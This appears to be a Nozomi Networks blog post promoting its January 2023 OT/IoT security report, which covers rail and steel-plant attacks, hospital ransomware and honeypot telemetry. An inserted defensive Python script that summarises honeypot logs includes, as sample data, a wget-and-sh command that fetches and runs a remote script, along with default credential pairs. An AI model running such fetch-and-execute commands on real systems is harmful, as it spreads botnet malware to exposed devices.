Nozomi Networks Researchers Take a Deep Look into the ICS Threat Landscape


Monitoring the constantly-evolving cyber threat landscape is essential in staying up-to-date on the latest threats and potential attack vectors. This allows organizations to anticipate vulnerabilities, proactively harden their systems, and implement countermeasures that can protect against malicious actors. By understanding how their networks may be susceptible to attack, organizations can take action to reduce the likelihood of a successful breach.

In the past six months, Nozomi Networks researchers have seen an increase in the number and severity of cyberattacks, disrupting businesses and critical infrastructure around the globe. Railways have been particularly targeted by attackers, necessitating increased protective protocols for rail operators. Additionally, hacktivists have utilized wiper malware as a means to undermine vital services for political reasons. With malicious actors continuously evolving their tactics, organizations must stay informed about the latest threats facing OT/IoT systems and take necessary steps to safeguard their assets from any potential attack.

Here are some of the highlights in our semi-annual OT/IoT Security Report, published today: 

  • Cyberattacks on critical infrastructure 
  • Hacktivist TTPs 
  • Intrusion alerts affecting OT environments 
  • Malware categories affecting IT, OT, and IoT 
  • Top vulnerable industries 
  • Recommendations and 2023 forecast

The Cyber Threat Landscape 

In the second half of 2022, we’ve continued to see cyberattacks on critical infrastructure (namely rail), hacktivists causing disruptive attacks, thefts of technology source code, and use of wiper malware. Below is a timeline summarizing the most significant cyber events—cyberattacks, new policies, malware, etc.—from July to December 2022:   

[Figure: OT & ICS Cybersecurity Threat Timeline 2H 2022, covering cyberattacks on critical infrastructure, hacktivist attacks, and wiper malware from July to December 2022]

In June and July 2022, the Mobarakeh Steel Company (MSC), Khouzestan Steel Company (KSC) and Hormozgan Steel Company (HOSCO) were hit by a cyberattack that disrupted their websites and production lines. The attack was claimed by the hacktivist group Gonjeshke Darande (Predatory Sparrow), which had previously used wiper malware to disrupt the Iranian train system. The incident is a reminder that critical infrastructure is a target for malicious actors regardless of their motive or affiliation.

Between August and September, there were several disruptive attacks on manufacturing, oil, water, and electric utility companies. In October, a ransomware attack hit CommonSpirit Health, the fourth-largest U.S. health system with 140 affiliate hospitals; the attack led to delays in surgeries and other patient care. There was also a series of cyberattacks across Europe. In December, a ransomware attack on the French hospital in Corbeil-Essonnes resulted in a data leak and disruption of operations.

In November, Continental, an automotive and rail technology giant that develops technologies such as automated braking systems, vehicle monitoring systems, and navigation systems, was hit with a cyberattack. The attackers had been inside Continental's networks before the attack became public, giving them access to numerous technical documents and source code for Continental's advanced technologies. Attackers obtaining source code for safety-relevant systems is a major concern: it gives them a head start in finding exploitable flaws in the products that embed that code.

Exclusive Nozomi Networks Insights 

In the report, we share exclusive statistics sourced from the fully anonymized detection telemetry of participating customer environments. We provide insights into the most critical intrusion alerts affecting IT, IoT, and OT environments.

We also share unique data collected by Nozomi Networks Labs honeypots, including:

  • Protocols involving hard-coded credentials
  • Attack source locations
  • Top credentials used
  • Number of unique attacker IPs
  • Top attacker IP addresses
  • Top executed commands

This data can help security teams get a better understanding of the threats they face and validate their existing defense strategy and approach.
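To show how the honeypot statistics listed above are derived from raw telemetry, here is an added example (not Nozomi Networks code and not taken from the report). The event format is an assumption: one JSON object per line with a source IP, protocol, an event type of "login" or "command", and either username/password or the command string. The sample events and the small default-credential list are constructed for illustration only; geolocation of attack sources is omitted because it needs an external IP-to-country database.

```python
"""Aggregate SSH/Telnet honeypot events into report-style summary statistics.

Added example, not Nozomi Networks code. The JSON-lines event format below is an
assumption; SAMPLE_EVENTS and DEFAULT_CREDS are constructed, not captured data.
"""
import json
from collections import Counter

# Constructed sample telemetry (RFC 5737 documentation addresses, not real attackers).
# One deliberately malformed line is included to show that parsing is tolerant.
SAMPLE_EVENTS = """\
{"ts":"2022-09-01T00:00:01Z","src_ip":"198.51.100.7","protocol":"ssh","event":"login","username":"root","password":"admin","success":false}
{"ts":"2022-09-01T00:00:03Z","src_ip":"198.51.100.7","protocol":"ssh","event":"login","username":"root","password":"root","success":true}
{"ts":"2022-09-01T00:00:04Z","src_ip":"198.51.100.7","protocol":"ssh","event":"command","cmd":"cat /proc/cpuinfo"}
{"ts":"2022-09-01T00:00:05Z","src_ip":"198.51.100.7","protocol":"ssh","event":"command","cmd":"wget http://203.0.113.9/bins.sh -O /tmp/x; sh /tmp/x"}
this line is not JSON and must be skipped
{"ts":"2022-09-01T00:01:10Z","src_ip":"203.0.113.25","protocol":"telnet","event":"login","username":"admin","password":"admin","success":true}
{"ts":"2022-09-01T00:01:11Z","src_ip":"203.0.113.25","protocol":"telnet","event":"command","cmd":"cat /proc/cpuinfo"}
{"ts":"2022-09-01T00:02:00Z","src_ip":"192.0.2.44","protocol":"telnet","event":"login","username":"root","password":"root","success":false}
{"ts":"2022-09-01T00:02:02Z","src_ip":"192.0.2.44","protocol":"telnet","event":"login","username":"admin","password":"1234","success":false}
"""

# Constructed illustrative set of vendor-default / hard-coded credential pairs.
DEFAULT_CREDS = {("root", "root"), ("admin", "admin"), ("admin", "1234")}


def parse_events(text):
    """Parse JSON-lines telemetry, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # a bad line should not discard the whole batch
    return events


def summarize(events, top_n=5):
    """Compute the per-report statistics: attacker IPs, credentials, commands, protocols."""
    logins = [e for e in events if e.get("event") == "login"]
    commands = [e for e in events if e.get("event") == "command"]

    attackers = Counter(e["src_ip"] for e in events)
    creds = Counter((e["username"], e["password"]) for e in logins)
    cmds = Counter(e["cmd"] for e in commands)
    logins_by_protocol = Counter(e["protocol"] for e in logins)
    successes_by_protocol = Counter(e["protocol"] for e in logins if e.get("success"))
    # Which protocols are being hammered with known default / hard-coded credentials.
    default_cred_attempts = Counter(
        e["protocol"] for e in logins if (e["username"], e["password"]) in DEFAULT_CREDS
    )

    return {
        "unique_attacker_ips": len(attackers),
        "top_attacker_ips": attackers.most_common(top_n),
        "top_credentials": creds.most_common(top_n),
        "top_commands": cmds.most_common(top_n),
        "logins_by_protocol": dict(logins_by_protocol),
        "successful_logins_by_protocol": dict(successes_by_protocol),
        "default_cred_attempts_by_protocol": dict(default_cred_attempts),
    }


if __name__ == "__main__":
    stats = summarize(parse_events(SAMPLE_EVENTS))
    for key, value in stats.items():
        print(f"{key}: {value}")
```

The same aggregation runs unchanged over a real honeypot export once the field names are mapped; the value for a defender is in comparing the top credentials and commands against what their own exposed OT/IoT devices still accept.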

Download our full report for detailed trend and pattern graphs, as well as additional insights into the vulnerability landscape and industries most affected by published vulnerabilities.

Recommendations & Forecast 

Organizations can take several steps to reduce the likelihood and impact of cyberattacks on critical infrastructure, such as monitoring for new threats and attack vectors, performing regular security audits, encrypting stored data, keeping all software and hardware up to date with the latest patches, and educating personnel about best practices for limiting exposure. Read our blog for our 2023 predictions.


OT/IoT Security Report – January 2023 

Nozomi Networks Labs evaluates the current threat landscape to report on notable cyberattacks on critical infrastructure, threat actor intrusion tactics, insights from our IoT honeypots gathered from malicious botnets, and analysis of ICS-CERT advisories to determine which industries are most vulnerable. 


A Deep Look Into the ICS Threat Landscape

January 25, 2023 | 7:30 AM PST, 10:30 AM EST, 4:30 PM CET  

Watch the Nozomi Networks Labs webinar for key insights not covered in the report.
